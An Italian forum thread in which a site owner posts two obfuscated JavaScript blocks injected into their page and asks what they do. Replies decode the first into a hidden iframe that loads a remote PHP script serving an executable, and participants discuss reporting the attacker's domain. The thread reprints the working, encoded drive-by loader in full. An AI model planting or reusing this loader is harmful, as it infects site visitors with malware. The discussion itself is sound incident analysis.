solo per veri Guru: significato script

[flessciato]

codice:

<script language=javascript>document.write(unescape('<script language="javascript">functionXXX dF(q){
var q1=unescape(q.substr(0,q.length-1)); 
vart='';
for(i=0;i<q1.length;i++)t+=String.fromCharCode(q1.charCodeAt(i)-q.substr(q.length-1,1));
document.write(unescape(t));}</script>'));
dF('&4Djgsbnf&31tsd&4E&38iuuq&4B00usbg/to.ofu/jogp0pvu/qiq&4Gt`je&4E2&38&31gsbnfcpsefs&4E1
&31ifjhiu&4E2&31xjeui&4E2&4F&4D0jgsbnf&4F1')</script>
<script language=javascript>document.write(unescape('<script language="javascript">functionXXX dF(q){
var q1=unescape(q.substr(0,q.length-1)); 
var t='';
for(i=0;i<q1.length;i++)t+=String.fromCharCode(q1.charCodeAt(i)-q.substr(q.length-1,1));
document.write(unescape(t));}</script>'));
dF('-;Kqnzium-:8{zk-;L-::p||x-;I77|zin6{v5vm|6qvnw7w}|6xpx-;N{gql-;L9-::-:8nziumjwzlmz-;L-:
:8-::-:8pmqop|-;L-::9-::-:8�ql|p-;L-::9-::-;M-;K7qnzium-;M8')</script>

questo script mi è stato incluso in una pagina web da remoto. Non mi chiedo come hanno fatto, ci metterei troppo tempo...

vorrei sapere però il significato dello script

[kluster]

(non sono certo un guru)
Basta che al posto di document.write metti un
alert(unescape(t));
e ti fa l'alert del codice generato che non è altro che un iframe con un file php che fa scaricare un eseguibile, presumibilmente un virus chiamato w32.exe, anche se il mio antivirus non lo segnala come tale, cmq non lo cliccherei.
Aprendolo in esadecimale ci sono richiami alla scrittura su registry e brutte scritte URLDownload.
Mah...

[flessciato]

la prima parte l'avevo già superata (in php decodificando la stringa).

Mi interessa la seconda: hai degli URLDownload... vedi i percorsi degli url? me li puoi segnalare?!

Grazie

[kluster]

no sono criptati.
Cmq vado ad intuito. Se hai decodificato la stringa iniziale hai gia' visto a che sito principale rimanda.


UN AVVISO.
ESEGUENDO COSI' COME E' IL CODICE POSTATO POTRESTE INSTALLARVI AUTOMATICAMENTE IL FILE W32.EXE CHE PARTE IN AUTOMATICO.

Sicchè a livello logico la discussione puo' continuare. Ma se hai ancora la possibilita' di modificare il post sarebbe meglio che tu lo cancellassi o ne cancellassi la parte di richiamo alla funzione DF

[flessciato]

si installa solo se usi explorer... comunque spezzo la stringa (con firefox almeno no)

[kluster]

si, infatti in firefox l'ho tranquillamente scaricato e controllato con un editor esadecimale.
passando il programma con avast e ricerca euristica cmq ancora non da' nessun alert.
O l'hanno fatto bene o la ricerca euristica è un po' come un terno al lotto

[flessciato]

questo è il sito degli (o dell') infami
http://xtraf.sn-net.info il sito funziona se togli la x (così non è attivo).

So che è un pò off-topic ma c'è un modo per segnalare un dominio simile (si trova in inghilterra) a "chi di dovere"?!

[kluster]

mah sull'Inghilterra non lo so, io qui passerei dal sito della polizia postale
http://www.poliziadistato.it/pds/inf.../contatti.html

[flessciato]

si si l'ho visto... è che dall'Italia non credo proprio che si interessino... se è dall'Italia per l'Italia si... sennò perdo solo tempo e magari devo anche subire domande inutili da parte loro. So già che mi sentirei fare le domande, e che non sarebbero fatte all PERSONA (che ho identificato) che ha fatto taroccamenti ai siti

[kluster]

ma ha preso il login o ha inserito dinamicamente quel codice?

Avevo letto dell'attacco via ajax di qualche tempo fa su myspace (o di un servizio simile) che usava il bug dei css di IE (della proprieta' background-image(javascript:....); ) che esegue javascript